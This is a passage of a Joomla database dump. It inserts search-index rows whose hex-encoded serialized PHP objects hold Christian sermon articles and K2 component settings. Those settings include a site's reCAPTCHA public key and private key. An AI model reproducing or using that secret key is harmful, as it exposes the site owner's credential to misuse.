0c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223132223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a353a224661697468223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a32303a2232343a636f72726563742d63687269737469616e223b733a373a22636174736c7567223b733a373a22323a6661697468223b733a363a22617574686f72223b733a393a224c6966656f61736973223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a33383a22636f6d706f6e656e742f6b322f6974656d2f32342d636f72726563742d63687269737469616e223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a393a224c6966656f61736973223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a393a224c6966656f61736973223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a353a224661697468223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a353a224661697468223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3234223b733a353a22726f757465223b733a35373a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d32343a636f72726563742d63687269737469616e223b733a353a227469746c65223b733a37363a22486f7720546f204265206120436f72726563742043687269737469616e20696e206120576f726c64206f6620506f6c6c7574696f6e20616e6420204d69787475726573202850617274203329223b733a31313a226465736372697074696f6e223b733a3336373a22205355425449544c453a2054484520494445414c204c4946455354594c4520464f5220412043485249535449414e2e202d20526f6d616e732031323a312d32204e6f772074686174207765277665206465616c742077697468207468652073706972697475616c20647574696573206f6620612043687269737469616e2c207765206e65656420746f20666f637573206f6e20746865206c6966657374796c65206f66206120747275652043687269737469616e2e20546869732069732074686520706f696e7420617420776869636820796f7520646966666572656e746961746520796f757273656c662066726f6d2074686520776f726c6420616e642073686f77207468656d207468726f756768207468652077617920796f75206c69766520796f7572206c6966652077686174206974206d65616e7320746f20626520612043687269737469616e20616e6420686f77206d756368206974207061797320746f20736572766520476f642e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30322d31322030373a34313a3537223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30322d31322030373a34313a3537223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(243, 'index.php?option=com_k2&view=item&id=25', 'index.php?option=com_k2&view=item&id=25:the-position-that-a-christian-must-take-in-these-last-days', 'The Position that a Christian must take In these last days', ' Rev 3:7-22, Mark 24: 3,4, 10-12 The Christians in Philadelphia : The Christians in Philadelphia are example true Christians who stand for God’s word and His name in these last days. They are said to have strength, they kept the word of God and there was nothing that could take the name of Jesus from their mouth. God’s Strength, the Word of God and the Name of Jesus are three major things that the devil has stolen from Christians’ lives today. And he has turned several churches to synagogue of Satan. ', '2017-06-25 14:18:31', 'fa413e48c05e8e6c594155fd47be2f1a', 1, 1, 1, '*', '2017-02-19 19:04:18', '0000-00-00 00:00:00', '2017-02-19 19:04:18', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223235223b733a353a22616c696173223b733a35383a227468652d706f736974696f6e2d746861742d612d63687269737469616e2d6d7573742d74616b652d696e2d74686573652d6c6173742d64617973223b733a373a2273756d6d617279223b733a3534343a223c703e52657620333a372d32322c204d61726b2032343a20332c342c2031302d31323c2f703e0d0a3c703e3c7374726f6e673e5468652043687269737469616e7320696e205068696c6164656c70686961203a3c2f7374726f6e673e205468652043687269737469616e7320696e205068696c6164656c7068696120617265206578616d706c6520747275652043687269737469616e732077686f207374616e6420666f7220476f64e280997320776f726420616e6420486973206e616d6520696e207468657365206c61737420646179732e205468657920617265207361696420746f206861766520737472656e6774682c2074686579206b6570742074686520776f7264206f6620476f6420616e6420746865726520776173206e6f7468696e67207468617420636f756c642074616b6520746865206e616d65206f66204a657375732066726f6d207468656972206d6f7574682e20476f64e280997320537472656e6774682c2074686520576f7264206f6620476f6420616e6420746865204e616d65206f66204a6573757320617265207468726565206d616a6f72207468696e677320746861742074686520646576696c206861732073746f6c656e2066726f6d2043687269737469616e73e28099206c6976657320746f6461792e20416e6420686520686173207475726e6564207365766572616c20636875726368657320746f2073796e61676f677565206f6620536174616e2e3c2f703e0d0a223b733a343a22626f6479223b733a333731373a220d0a3c703e54686573652043687269737469616e732068617665206e6f742064656e6965642068696d2e20546865792068617665206e6f742062656c69657665642066616c73652074656163686572732e2054686579206861766520686164207065727365637574696f6e2c2079657420746865792068617665206e6f7420736169642074686174207468657920646f206e6f74206b6e6f77207468656972204c6f72642e20546865792068617665206c6974746c6520737472656e6774682e204275742074686579206861642061636869657665642061206772656174206465616c2e20546865792068617665207265616c6c7920726570656e7465642e20476f64207468657265666f72652c2070726f6d69736564207468617420746865792077696c6c206265636f6d652070696c6c61727320696e207468652074656d706c65206f6620476f6420285265762e203320762e3132292e205468697320636875726368206d61792068617665206265656e20736d616c6c20696e206e756d626572206f7220696e206d6174657269616c207265736f75726365732c2062757420476f642077617320676f696e6720746f206d616b65207468656d207374726f6e672e2054686579206172652070726f6d6973656420616e206f70656e20646f6f722e20496e205363726970747572652c20616e206f70656e20646f6f722072656665727320746f20616e206f70656e696e6720746f207072656163682074686520476f7370656c202841637473203520762e31392d3230292c20616e64207468652072617074757265206f66207468652043687572636820285265762e203420762e31292ec2a03c2f703e0d0a3c703e5468657265206973206e6f20646966666572656e63652c207265616c6c792c20696e20736f6d656f6e652077686f20666f6c6c6f777320536174616e20616e6420736f6d656f6e652077686f2070726574656e647320746f20626520612043687269737469616e2e20c2a0426f746820617265206c6f73742e20546865202273796e61676f677565206f6620536174616e22206973206a757374206120706c616365206f6620776f727368697020776865726520476f64206973206e6f74204c6f72642e204120626f6479206f662043687269737469616e73206d656574696e6720636f756c6420616c736f20626520612073796e61676f677565206f6620536174616e2c20696620746865207472756520576f7264206f6620476f64206973206e6f742074617567687420616e642072656365697665642e20476f64e2809973206a7564676d656e7420746f20737563682070656f706c652069732074686520686f7572206f662074656d70746174696f6e2e20546869732072656665727320746f207468652047726561742054726962756c6174696f6e2064657363726962656420696e204d61742e2032342076732031352d32322e3c2f703e0d0a3c703e496e20746865736520656e642074696d65732c20476f64206973206f70656e696e67206d616e79207472656d656e646f757320646f6f7273206f66206f70706f7274756e69747920616e6420746865726520697320616c7761797320616e20696e686572656e742064616e676572206f66206661696c696e6720746f20616476616e636520617420436872697374277320636f6d6d616e642e20596f75206d6179206665656c20796f752068617665206f6e6c792061206c6974746c6520737472656e6774682c2062757420476f642063616e206d616b6520796f752061207374726f6e6720616e64206d69676874792070696c6c617220696e20486973204b696e67646f6d2c20612073706972697475616c2077617272696f722077686f2069732061626c6520746f2077616c6b207468726f75676820657665727920646f6f72204865206f70656e732ec2a03c2f703e0d0a3c703e4c6574206d652061736b20796f753a205768617420697320686f6c64696e6720796f75206261636b2066726f6d2066756c66696c6c696e6720476f6427732063616c6c20666f7220796f7572206c6966653f20497320697420666561722c2066696e616e6365732c20796f7572206865616c74682c206f72206368616c6c656e6765733f204e65766572206769766520757020696e20796f75722043687269737469616e206a6f75726e6579213c2f703e0d0a3c703e54686520636f6e646974696f6e206f662061204261636b736c696464656e2043687269737469616e212052657620333a31342d32323c2f703e0d0a3c703e5468652063687572636820696e204c616f64696365612069732061206465736372697074696f6e206f66206261636b736c696464656e2043687269737469616e732e2054686f736520746861742068617665206f6e6365206265656e20696e206661697468206275742062656361757365206f662064656365697466756c6e657373206f662072696368657320616e64207072696465206f66206c6966652074686579206c6f737420746865206c696665206f6620476f642e2054686569722070726f626c656d2069732074686174207468657920646f206e6f74206b6e6f77207468617420476f6420686173206c656674207468656d2e20486f77206d616e79206f6620757320617265206c6976696e67206f7572206c697665732077697468207375636820617373756d7074696f6e3f2052656164204c756b6520323a34332d34342ec2a03c2f703e0d0a3c703e546865206465736372697074696f6e206f662073756368206b696e642043687269737469616e733a2052657620333a31372d31382e3c2f703e0d0a3c703e312e20506f6f722e204d61747468657720363a31392d32302e20596f75722074727565207765616c746820697320696e207175616e74697479206f662074726561737572657320796f75206c61696420757020696e2068656176656e2e20486f77206d756368206f6620796f75206973206265696e6720676976656e20756e746f2074686520776f726b206f6620476f642e20546865204c616f64696365612043687269737469616e732068617665206162616e646f6e6564206b696e67646f6d207365727669636520666f72207468652065617274686c792073686f77732ec2a03c2f703e0d0a3c703e322e20426c696e642e204973616961682034333a382e204d6174746865772031333a31352d31362e20546869732069732073706972697475616c20696e73656e73697469766974792e20c2a0426c696e646e65737320746f20746865207468696e6773206f6620476f642ec2a03c2f703e0d0a3c703e332e204e616b65642e2047656e20323a31362d31373b20333a372d31312e205468697320697320776861742068617070656e7320746f2061206d616e20746861742076696f6c6174657320646976696e6520696e737472756374696f6e732e2054686520676c6f7279206f6620746865204c6f726420636f7665726564204164616d20616e642045766520696e207468652067617264656e2c20627574207768656e2074686579206c6f7374206974207468657920726573756c74656420746f20666967206c65617665732c20776869636820636f756c64206e6f7420636f766572207468656972206e616b65646e6573732e3c2f703e0d0a3c703e5468652062656c696576657273206174204c616f646963656120776572652073706972697475616c6c79206c756b657761726d20616e6420436872697374207361696420746865697220636f6e646974696f6e206d7573742062652072656d65646965642e204a657375732074656c6c7320746869732063687572636820746f2067657420657863697465642061626f75742073657276696e67204a6573757320616e6420726570656e74206f66207468656972204c756b65207761726d6e6573732e205768656e204a657375732072657475726e732c207765206d75737420626520666f756e6420776f726b696e672e20576f726b20666f7220746865206e6967687420697320636f6d696e67207768656e206e6f206d616e20776f726b2e204a6f686e20393a342e3c2f703e0d0a3c703ec2a0486f7720646f20796f75206b6e6f7720696620796f7520617265206c756b657761726d3f2041736b20796f757273656c66207468657365207175657374696f6e733ac2a03c2f703e0d0a3c703e2d2041726520796f7520636f6d6d697474656420746f206576616e67656c69736d3fc2a03c2f703e0d0a3c703e2d2041726520796f7520636f6d6d697474656420746f206c6976696e67206120686f6c79206c6966653fc2a03c2f703e0d0a3c703e2d20497320796f757220686561727420736574206f6e20746865207468696e6773206f6620476f643f3c2f703e0d0a3c703e2d2041726520796f7520636f6d6d697474656420746f20796f7572206c6f63616c206368757263682073657276696365733fc2a03c2f703e0d0a3c703e2d2041726520796f7520636f6d6d697474656420746f207370656e64696e672074696d6520696e207072617965722c20776f727368697020616e642074686520576f72643fc2a03c2f703e0d0a3c703e2d20486f7720736572696f757320646f20796f752074616b65207468652061737369676e6d656e747320696e20796f75722068616e643f3c2f703e0d0a3c703e2d20416d6f6e67206f74686572e280a63c2f703e0d0a3c703e4265686f6c642c204865207374616e64732061742074686520646f6f722c206b6e6f636b696e673a20696620796f752063616e20686561722048697320766f6963652c20616e64206f70656e2074686520646f6f72206f6620796f7572206c6966652c2048652077696c6c20636f6d6520696e20746f20796f752c20616e642077696c6c2064696e65207769746820796f752e20486520646f6573206e6f742077616e7420796f7520746f20636f6e74696e7565206c696b6520746869732062656361757365204865206c6f76657320796f752e20537461727420612066726573682077616c6b207769746820476f6420616e64206974207368616c6c2062652077656c6c207769746820796f752ec2a03c2f703e0d0a3c703ec2a03c2f703e223b733a353a226361746964223b733a313a2232223b733a31303a22637265617465645f6279223b733a333a22313936223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30322d31392031393a30383a3032223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3